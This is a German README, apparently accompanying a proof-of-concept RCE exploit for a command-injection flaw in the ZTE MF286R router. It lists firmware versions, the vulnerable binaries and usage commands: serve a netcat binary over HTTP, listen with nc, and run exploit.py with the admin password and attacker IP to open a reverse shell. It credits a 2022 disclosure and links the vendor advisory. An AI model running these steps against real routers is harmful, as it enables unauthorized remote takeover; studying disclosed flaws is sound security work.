
Proof-of-Concept für die Schwachstelle zur Befehlseinschleusung, die den ZTE MF286R Router betrifft, einschließlich eines RCE-Exploits.
Firmware-Details:
wa_inner_version: BD_POSTEMF286RMODULEV1.0.0B12
cr_version: CR_ITPOSTEMF286RV1.0.0B10
pip install requests)Die Sicherheitslücke ist eine gemeinsame Befehlseinschleusung zwischen der zte_net_link_detect-Binärdatei und dem WATCH_DOG_SWITCH-Handler im Webserver goahead-Binär.
Beachten Sie, dass die Sicherheitslücke nur ausgenutzt werden kann, wenn der Router mit dem WAN oder über eine SIM-Karte mit dem Internet verbunden ist. (Der Wert des Schlüssels "ppp_status" muss "ppp_connected" oder "ipv4_ipv6_connected" oder "ipv6_connected" sein).
Die Idee des Exploits besteht darin, das statische Netcat-Binär von einem HTTP-Server herunterzuladen und damit eine Reverse-Shell zu öffnen. P.S.: Das in diesem Ordner enthaltene Netcat ist Big Endian.
python3 -m http.server 80809999 mit nc -lvp 9999python3 exploit.py http://<router> <admin_password> <attacker_ip, z. B. 192.168.1.101>Diese Sicherheitslücke wurde im September 2022 von Andrea Maugeri gemeldet. https://support.zte.com.cn/support/news/NewsDetail.aspx?newsId=1028664